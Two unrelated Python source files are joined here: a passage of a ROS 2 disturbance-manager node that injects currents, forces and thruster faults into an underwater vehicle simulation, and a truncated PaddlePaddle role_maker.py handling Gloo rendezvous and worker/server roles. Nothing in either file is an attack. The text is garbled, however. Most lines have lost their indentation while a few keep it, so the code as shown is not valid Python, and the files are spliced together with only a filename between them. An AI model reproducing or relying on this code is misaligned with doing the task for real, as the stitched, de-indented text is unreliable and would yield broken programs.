propeller_efficiency=['starting_time', 'thruster_id', 'duration',
'efficiency'],
thrust_efficiency=['starting_time', 'thruster_id', 'duration',
'efficiency'])
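        # Illustrative example only (the key names under 'disturbances' and all
        # values are assumptions for documentation purposes): the disturbance list
        # is expected to arrive as nested ROS 2 parameters, e.g. from a YAML file:
        #
        #   disturbance_manager:
        #     ros__parameters:
        #       disturbances:
        #         d0:
        #           type: current
        #           starting_time: 10.0
        #           velocity: 0.5
        #           horizontal_angle: 0.0
        #           vertical_angle: 0.0
        #         d1:
        #           type: thruster_state
        #           starting_time: 20.0
        #           duration: 5.0
        #           thruster_id: 0
        #           is_on: false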
thruster_ids = list()
#if self.has_parameter('disturbances'):
#self._logger.info(str(self.get_parameters(['/'])))
self._disturbances = self.get_parameters_by_prefix('disturbances')
self._disturbances = parse_nested_params_to_dict(self._disturbances, unpack_value=True)
if self._disturbances != {}:
#if type(self._disturbances) != list:
# raise RuntimeError('Current specifications must be '
# 'given as a list of dict')
#for i in range(len(self._disturbances)):
for key in self._disturbances.keys():
item = self._disturbances[key]
if type(item) != dict:
raise RuntimeError('Disturbance description must be'
' given as a dict')
if 'type' not in item:
raise RuntimeError('Type of disturbance not '
'specified')
if item['type'] not in specs:
raise RuntimeError(
'Invalid type of disturbance, value=%s' % item['type'])
for spec in specs[item['type']]:
if spec not in item:
raise RuntimeError(
'Invalid current model specification, '
'missing tag=%s' % spec)
if item['type'] == 'thruster_state':
thruster_ids.append(item['thruster_id'])
# Create flag to indicate that perturbation has been applied
self._disturbances[key]['is_applied'] = False
self._disturbances[key]['ended'] = False
else:
raise RuntimeError('No disturbance specifications given')
# List all disturbances to be applied
#for i in range(len(self._disturbances)):
cpt = 0
for key in self._disturbances.keys():
self._logger.info('Disturbance #%d: %s' % (cpt, self._disturbances[key]))
cpt = cpt + 1
self._body_force = np.zeros(3)
self._body_torque = np.zeros(3)
self._body_wrench_msg = WrenchStamped()
# For body wrench disturbances, publish a topic
self._wrench_topic = self.create_publisher(
WrenchStamped, 'wrench_perturbation', 1)
vehicle_name = self.get_namespace().replace('/', '')
# Obtain service proxy
self._service_cb = dict()
service_list = list()
try:
service_list.append(self.create_client(
SetCurrentVelocity, '/hydrodynamics/set_current_velocity'))
self._service_cb['current_velocity'] = service_list[-1]
            # ApplyBodyWrench is not available in the ROS 2 gazebo_msgs API, so use
            # the imported ApplyLinkWrench service instead (the exact service path
            # depends on how the gazebo_ros force-system plugin is namespaced)
            service_list.append(self.create_client(
                ApplyLinkWrench, '/gazebo/apply_link_wrench'))
self._service_cb['wrench'] = service_list[-1]
self._service_cb['thrusters'] = dict()
for item in self._disturbances.values():
                if item['type'] == 'thruster_state':
                    thruster_id = item['thruster_id']
                    if 'state' not in self._service_cb['thrusters']:
                        self._service_cb['thrusters']['state'] = dict()
                    service_list.append(self.create_client(
                        SetThrusterState,
                        self.build_service_name(vehicle_name, thruster_id, 'set_thruster_state')))
                    self._service_cb['thrusters']['state'][thruster_id] = service_list[-1]
                elif item['type'] == 'propeller_efficiency':
                    thruster_id = item['thruster_id']
                    if 'propeller_efficiency' not in self._service_cb['thrusters']:
                        self._service_cb['thrusters']['propeller_efficiency'] = dict()
                    service_list.append(self.create_client(
                        SetThrusterEfficiency,
                        self.build_service_name(vehicle_name, thruster_id, 'set_dynamic_state_efficiency')))
                    self._service_cb['thrusters']['propeller_efficiency'][thruster_id] = service_list[-1]
                elif item['type'] == 'thrust_efficiency':
                    thruster_id = item['thruster_id']
                    if 'thrust_efficiency' not in self._service_cb['thrusters']:
                        self._service_cb['thrusters']['thrust_efficiency'] = dict()
                    service_list.append(self.create_client(
                        SetThrusterEfficiency,
                        self.build_service_name(vehicle_name, thruster_id, 'set_thrust_force_efficiency')))
                    self._service_cb['thrusters']['thrust_efficiency'][thruster_id] = service_list[-1]
except Exception as e:
self._logger.info('Service call failed, error=%s' % str(e))
sys.exit(-1)
# Test if services are reachable
try:
#self._service_cb.values()
# services = ['/hydrodynamics/set_current_velocity',
# '/gazebo/apply_body_wrench']
# for item in self._disturbances:
# if item['type'] == 'thruster_state':
# services.append('/%s/thrusters/%d/set_thruster_state' % (vehicle_name, item['thruster_id']))
# elif item['type'] == 'propeller_efficiency':
# services.append('/%s/thrusters/%d/set_dynamic_state_efficiency' % (vehicle_name, item['thruster_id']))
# elif item['type'] == 'thrust_efficiency':
# services.append('/%s/thrusters/%d/set_thrust_force_efficiency' % (vehicle_name, item['thruster_id']))
for s in service_list:
ready = s.wait_for_service(timeout_sec=10)
if not ready:
raise RuntimeError('Service %s not ready' % (s.srv_name))
except Exception as e:
self._logger.error('Some services are not available! message=' + str(e))
self._logger.error('Closing node...')
sys.exit(-1)
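        # Publish the currently accumulated body wrench on 'wrench_perturbation'
        # every 0.1 s so other nodes can monitor the applied perturbation.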
self._wrench_timer = self.create_timer(0.1, self._publish_wrench_disturbance)
#rate = self.create_rate(100)
#FREQ = 100
        rate = self.create_rate(100)
while rclpy.ok():
            t = time_in_float_sec(self.get_clock().now())
#for i in range(len(self._disturbances)):
for d in self._disturbances.values():
#d = self._disturbances[i]
if t > d['starting_time'] and not d['is_applied']:
###########################################################
if d['type'] == 'current':
self.set_current(d['velocity'], d['horizontal_angle'],
d['vertical_angle'])
###########################################################
elif d['type'] == 'wrench':
self.set_link_wrench(d['force'],
d['torque'],
-1,
d['starting_time'])
###########################################################
elif d['type'] == 'thruster_state':
self.set_thruster_state(d['thruster_id'], bool(d['is_on']))
###########################################################
elif d['type'] == 'propeller_efficiency':
self.set_propeller_efficiency(d['thruster_id'], d['efficiency'])
###########################################################
elif d['type'] == 'thrust_efficiency':
self.set_thrust_efficiency(d['thruster_id'], d['efficiency'])
# Set applied flag to true
#self._disturbances[i]['is_applied'] = True
d['is_applied'] = True
if 'duration' in d:
if d['duration'] == -1:
#self._disturbances[i]['ended'] = True
d['ended'] = True
else:
#self._disturbances[i]['ended'] = True
d['ended'] = True
elif d['is_applied'] and 'duration' in d and not d['ended']:
if d['duration'] > 0:
if self.get_clock().now().nanoseconds > int((d['starting_time'] + d['duration']) * 1e9):
###########################################################
if d['type'] == 'current':
# Set current to zero
self.set_current(0, d['horizontal_angle'],
d['vertical_angle'])
###########################################################
elif d['type'] == 'wrench':
# Cancel out force and torque
self.set_link_wrench([-1 * d['force'][n] for n in range(3)],
[-1 * d['torque'][n] for n in range(3)],
-1,
time_in_float_sec(self.get_clock().now()))
###########################################################
elif d['type'] == 'thruster_state':
self.set_thruster_state(d['thruster_id'], not bool(d['is_on']))
###########################################################
elif d['type'] == 'propeller_efficiency':
self.set_propeller_efficiency(d['thruster_id'], 1.0)
###########################################################
elif d['type'] == 'thrust_efficiency':
self.set_thrust_efficiency(d['thruster_id'], 1.0)
#self._disturbances[i]['ended'] = True
d['ended'] = True
rate.sleep()
# =========================================================================
def __del__(self):
if rclpy.ok():
self.destroy_node()
rclpy.shutdown()
self.thread.join()
# =========================================================================
    def _publish_wrench_disturbance(self):
msg = WrenchStamped()
msg.header.stamp = self.get_clock().now().to_msg()
msg.header.frame_id = 'world'
msg.wrench.force = Vector3(x=self._body_force[0], y=self._body_force[1], z=self._body_force[2])
msg.wrench.torque = Vector3(x=self._body_torque[0], y=self._body_torque[1], z=self._body_torque[2])
# Publish the applied body wrench
self._wrench_topic.publish(msg)
return True
# =========================================================================
def set_current(self, velocity, horizontal_angle, vertical_angle):
        self._logger.info('Applying current velocity model...')
req = SetCurrentVelocity.Request()
req.velocity = velocity
req.horizontal_angle = horizontal_angle
req.vertical_angle = vertical_angle
future = self._service_cb['current_velocity'].call_async(req)
self.wait_for_service_completion(
future,
'Current velocity changed successfully at %f s! vel= %f m/s' % (time_in_float_sec(self.get_clock().now()), velocity),
'Failed to change current velocity')
# if self._service_cb['current_velocity'].call(req):
# self._logger.info('Current velocity changed successfully at %f s! vel= %f m/s' % (time_in_float_sec(self.get_clock().now()), velocity))
# else:
# self._logger.error('Failed to change current velocity')
# =========================================================================
def set_link_wrench(self, force, torque, duration, starting_time):
ns = self.get_namespace().replace('/', '')
body_name = '%s/base_link' % ns
req = ApplyLinkWrench.Request()
self._body_force = np.array([self._body_force[i] + force[i] for i in range(3)])
self._body_torque = np.array([self._body_torque[i] + torque[i] for i in range(3)])
self._body_wrench_msg = WrenchStamped()
self._body_wrench_msg.header.stamp = self.get_clock().now().to_msg()
self._body_wrench_msg.header.frame_id = 'world'
self._body_wrench_msg.wrench.force = Vector3(x=self._body_force[0],
y=self._body_force[1],
z=self._body_force[2])
self._body_wrench_msg.wrench.torque = Vector3(x=self._body_torque[0],
y=self._body_torque[1],
z=self._body_torque[2])
(secs, nsecs) = float_sec_to_int_sec_nano(starting_time)
(d_secs, d_nsecs) = float_sec_to_int_sec_nano(duration)
        req.link_name = body_name
req.reference_frame = 'world'
        req.reference_point = Point(x=0.0, y=0.0, z=0.0)
req.wrench = self._body_wrench_msg.wrench
req.start_time = rclpy.time.Time(seconds=secs, nanoseconds=nsecs).to_msg()
req.duration = rclpy.time.Duration(seconds=d_secs, nanoseconds=d_nsecs).to_msg()
future = self._service_cb['wrench'].call_async(req)
        self.wait_for_service_completion(
future,
'Link wrench perturbation applied!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())),
'Failed to apply link wrench!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())))
# if success:
# self._logger.info('Body wrench perturbation applied!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())))
# else:
# self._logger.error('Failed to apply body wrench!, body_name=%s, t=%.2f s' % (body_name, time_in_float_sec(self.get_clock().now())))
# =========================================================================
def set_thruster_state(self, thruster_id, is_on):
req = SetThrusterState.Request()
req.on = is_on
future = self._service_cb['thrusters']['state'][thruster_id].call_async(req)
time = time_in_float_sec(self.get_clock().now())
        self.wait_for_service_completion(future,
'Setting state of thruster #%d, state=%s, t=%.2f s' % (thruster_id, 'ON' if is_on else 'OFF', time),
'Setting state of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# if self._service_cb['thrusters']['state'][thruster_id].call(req):
# self._logger.info('Setting state of thruster #%d, state=%s, t=%.2f s' % (thruster_id, 'ON' if is_on else 'OFF', time))
# else:
# time = time_in_float_sec(self.get_clock().now())
# self._logger.error('Setting state of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# =========================================================================
def set_propeller_efficiency(self, thruster_id, eff):
req = SetThrusterEfficiency.Request()
req.efficiency = eff
future = self._service_cb['thrusters']['propeller_efficiency'][thruster_id].call_async(req)
time = time_in_float_sec(self.get_clock().now())
        self.wait_for_service_completion(future,
'Setting propeller efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time),
'Setting propeller efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# if self._service_cb['thrusters']['propeller_efficiency'][thruster_id].call(req):
# time = time_in_float_sec(self.get_clock().now())
# self._logger.info('Setting propeller efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time))
# else:
# time = time_in_float_sec(self.get_clock().now())
# self._logger.error('Setting propeller efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# =========================================================================
def set_thrust_efficiency(self, thruster_id, eff):
req = SetThrusterEfficiency.Request()
req.efficiency = eff
future = self._service_cb['thrusters']['thrust_efficiency'][thruster_id].call_async(req)
time = time_in_float_sec(self.get_clock().now())
        self.wait_for_service_completion(
future,
'Setting thrust efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time),
'Setting thrust efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# if self._service_cb['thrusters']['thrust_efficiency'][thruster_id].call(req):
# time = time_in_float_sec(self.get_clock().now())
# self._logger.info('Setting thrust efficiency of thruster #%d, eff=%s, t=%.2f s' % (thruster_id, eff, time))
# else:
# time = time_in_float_sec(self.get_clock().now())
# self._logger.error('Setting thrust efficiency of thruster #%d failed! t=%.2f s' % (thruster_id, time))
# =========================================================================
    def wait_for_service_completion(self, future, success_msg, error_msg):
        # The node is spun by a background thread (see __init__), so the future
        # completes asynchronously; poll until it is done, then report once.
        while rclpy.ok() and not future.done():
            time.sleep(0.01)
        try:
            future.result()
        except Exception as e:
            self._logger.error('%s, error=%s' % (error_msg, str(e)))
        else:
            self._logger.info(success_msg)
# =========================================================================
    def build_service_name(self, ns, thruster_id, service_name) -> str:
return '/%s/thrusters/id_%d/%s' % (ns, thruster_id, service_name)
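    # For example (illustrative namespace only):
    #   build_service_name('rexrov', 0, 'set_thruster_state')
    #   -> '/rexrov/thrusters/id_0/set_thruster_state'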
# =============================================================================
def main():
print('Starting disturbance manager')
rclpy.init()
try:
sim_time_param = is_sim_time()
node = DisturbanceManager('disturbance_manager', parameter_overrides=[sim_time_param])
rclpy.spin(node)
except rclpy.exceptions.ROSInterruptException as rosInter:
print('Caught ROSInterruptException exception' + str(rosInter))
except Exception as e:
print('Caught exception: '+str(e))
# finally:
# if rclpy.ok():
# rclpy.shutdown()
# node.destroy_node()
# node.thread.join()
print('Exiting')
# =============================================================================
if __name__ == '__main__':
main()
|
role_maker.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
WORKER = 1
SERVER = 2
HETER_WORKER = 3
ALL = 4
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
class RENDEZVOUS:
HDFS = 1
FILE = 2
HTTP = 3
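    # The rendezvous constants select how processes exchange addresses before the
    # gloo context is built: a shared HDFS path, a shared file-system path, or an
    # HTTP key-value store started by the rank-0 process.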
def __init__(self):
self._worker_comm = None
self._server_comm = None
self._nodes_comm = None
self._comm_world = ["worker", "server", "all"]
self._err_init = "gloo is not initialized, will not communicator with other nodes"
self._err_type = "gloo initialized error, please check arguments"
self._err_world = "argument error, comm_world must in {}".format(
self._comm_world)
self._is_initialized = False
self._init_timeout_seconds = 3600
self._run_timeout_seconds = 9999999
self._rendezvous = None
self._role = None
self._iface = None
self._role_id = -1
self._worker_num = -1
self._server_num = -1
self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
def _init_fs(self, fs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
def __start_kv_server(http_server_d, size_d):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(port, size_d)
http_server.start()
wait_seconds = 5
while http_server_d.get("running", False):
time.sleep(wait_seconds)
http_server.stop()
def init_kv_server(http_server_d):
size_d = {
"trainer": self._worker_num,
"pserver": self._server_num,
"all": self._worker_num + self._server_num
}
http_server_d["running"] = True
# child process for http server
_http_server = Process(
target=__start_kv_server, args=(http_server_d, size_d))
_http_server.daemon = True
# set running status to True
# start child process
_http_server.start()
return _http_server
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_http_store(ip, port, role)
ep = ":".join([ip, str(port)])
wait_server_ready([ep])
gloo.init()
return gloo
port = int(port)
if start_http_server:
http_server = init_kv_server(http_server_d)
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
if start_http_server:
http_server_d["running"] = False
http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
            raise ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
def __get_default_iface_from_interfaces(self):
"""
get default physical interface
"""
res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
"\n")
for item in res:
if "BROADCAST" in item:
return item.split(":")[1].strip()
return "lo"
def barrier(self, comm_world):
"""
        barrier across the processes in the given comm_world ("worker", "server" or "all")
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
        all gather across the processes in the given comm_world
        Args:
            input(any): object to all gather
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
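    # Minimal usage sketch (assumes init() has completed successfully on every
    # participating process; paths and values are illustrative only):
    #
    #   gloo = Gloo()
    #   gloo.init(Gloo.RENDEZVOUS.FILE, Role.WORKER, role_id=0,
    #             worker_num=2, server_num=1,
    #             kwargs={"dfs.path": "/tmp/gloo", "store.prefix": ""})
    #   gloo.barrier("worker")
    #   summed = gloo.all_reduce([1, 2, 3], mode="sum", comm_world="worker")
    #   gathered = gloo.all_gather(local_rank, comm_world="worker")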
class RoleMakerBase(object):
"""
RoleMakerBase is a base class for assigning a role to current process
in distributed training.
A paddle developer can implement RoleMakerBase to design a role maker
for worker or pserver assignment.
"""
def __init__(self):
self._worker_endpoints = []
self._server_endpoints = []
self._role_is_generated = False
self._role = None
self._current_id = -1
# for heter parameter server mode
self._heter_trainer_endpoints = []
self._heter_trainer_device = "CPU"
self._is_heter_parameter_server_mode = False
def _is_worker(self):
"""
return is_worker() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_server(self):
"""
return is_server() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_first_worker(self):
"""
Check whether the node is the first instance of worker.
Returns:
bool: True if this is the first node of worker,
False if not.
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_num(self):
"""
Get current total worker number.
Returns:
int: worker number
"""
raise NotImplementedError("Please implement this method in child class")
def _server_num(self):
"""
Get current total server number.
Returns:
int: server number
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_index(self):
"""
Get current worker id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _server_index(self):
"""
Get current server id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _role_id(self):
"""
Get current id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _node_num(self):
"""
Get the training node number
Returns:
int: node num
"""
raise NotImplementedError("Please implement this method in child class")
def _get_trainer_endpoints(self):
"""
return trainer endpoints
"""
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
return pserver endpoints
"""
return self._server_endpoints
def to_string(self):
return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
self._role, self._current_id, self._worker_endpoints,
self._server_endpoints)
def _all_gather(self, input, comm_world="worker"):
print("warning: RoleMakerBase does not have all gather worker.")
return None
def _all_reduce(self, input, mode="sum", comm_world="worker"):
"""
Args:
input(list/numpy.array): array of one dim
output(list/numpy.array): array of one dim
mode(str): "sum" or "min" or "max"
"""
print("warning: RoleMakerBase does not have all reduce worker.")
return None
def _barrier(self, comm_world):
"""
barrier between trainers if current role is TRAINER
"""
print("warning: RoleMakerBase does not have barrier worker.")
def _is_heter_worker(self):
"""
Return is_heter_worker() of current process
"""
warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
return False
def _heter_worker_num(self):
"""
Get current total heter-worker number.
Returns:
int: heter_worker number
"""
warnings.warn(
"RoleMakerBase does not have function: _heter_worker_num.")
return 0
def _get_heter_worker_endpoints(self):
"""
Returns:
            string: all heter_trainers' endpoints
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints
def _get_heter_worker_endpoint(self):
"""
Returns:
int: corresponding heter_trainer's endpoint
e.g: if we have 4 cpu-trainer(default), 2 gpu-trainer(heter)
then No.0 and No.2 cpu-trainer will work with No.0 gpu-trainer
and No.1 and No.3 cpu-trainer will work with No.1 gpu-trainer
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints[(self._current_id) %
self._heter_worker_num()]
def _get_heter_worker_device(self):
"""
Returns:
string: heter_trainer's device of current node, e.g: CPU/GPU/XPU
"""
return self._heter_trainer_device.upper()
class PaddleCloudRoleMaker(RoleMakerBase):
def __init__(self, is_collective=False, **kwargs):
super(PaddleCloudRoleMaker, self).__init__()
self._is_collective = is_collective
self._non_distributed = False
self._kwargs = kwargs
self._role_is_generated = False
self._server_endpoints = []
self._worker_endpoints = []
self._gloo = Gloo() # gloo instance
def _barrier(self, comm_world):
self._gloo.barrier(comm_world)
def _all_gather(self, input, comm_world="worker"):
return self._gloo.all_gather(input, comm_world)
def _all_reduce(self, input, mode="sum", comm_world="worker"):
return self._gloo.all_reduce(input, mode, comm_world)
def _is_worker(self):
"""
whether current process is worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER
def _is_server(self):
"""
whether current process is server
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.SERVER
def _is_first_worker(self):
"""
whether current process is worker of rank 0
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER and self._current_id == 0
def _worker_index(self):
"""
get index of current worker
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _server_index(self):
"""
get index of current server
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _role_id(self):
"""
get index of current node
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _worker_num(self):
"""
        return the current number of workers
"""
if not self._role_is_generated:
self._generate_role()
return self._trainers_num
def _server_num(self):
"""
return the current number of server
"""
if not self._role_is_generated:
self._generate_role()
return len(self._get_pserver_endpoints(
)) if self._get_pserver_endpoints() is not None else 0
def _node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_trainer_endpoints(self):
"""
get endpoint of all trainers
"""
if not self._role_is_generated:
self._generate_role()
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
get endpoint of all pservers
"""
if not self._role_is_generated:
self._generate_role()
return self._server_endpoints
def _is_non_distributed(self):
"""
        Return True if the environment variables required by fleetrun are not found,
        i.e. the program was launched directly with python instead of fleetrun
"""
if not self._role_is_generated:
self._generate_role()
return self._non_distributed
def _heter_worker_num(self):
"""
get heter worker nums
"""
if not self._role_is_generated:
self._generate_role()
return self._heter_trainers_num
def _is_heter_worker(self):
"""
whether current process is heter worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.HETER_WORKER
def _ps_env(self):
try:
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
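            # Illustrative environment for a single PSERVER process (addresses and
            # ports are example values only):
            #   PADDLE_PSERVERS_IP_PORT_LIST=127.0.0.1:6001,127.0.0.1:6002
            #   PADDLE_TRAINER_ENDPOINTS=127.0.0.1:6170,127.0.0.1:6171
            #   PADDLE_TRAINERS_NUM=2
            #   TRAINING_ROLE=PSERVER
            #   POD_IP=127.0.0.1
            #   PADDLE_PORT=6001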
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST")
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
if self._worker_endpoints:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = int(os.environ["PADDLE_TRAINERS_NUM"])
training_role = os.environ["TRAINING_ROLE"]
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv(
"PADDLE_HETER_TRAINER_IP_PORT_LIST", None)
heter_trainer_device = os.getenv("PADDLE_HETER_TRAINER_DEVICE",
None)
if heter_trainer_eplist and heter_trainer_device:
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
current_node_device = heter_trainer_device.upper()
if current_node_device not in ["CPU", "GPU", "XPU"]:
raise ValueError(
"Heter Trainer doesn't support {} device now, please use CPU / GPU / XPU(KunLun)".
format(heter_trainer_device))
self._heter_trainer_device = current_node_device
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = int(os.environ["PADDLE_TRAINER_ID"])
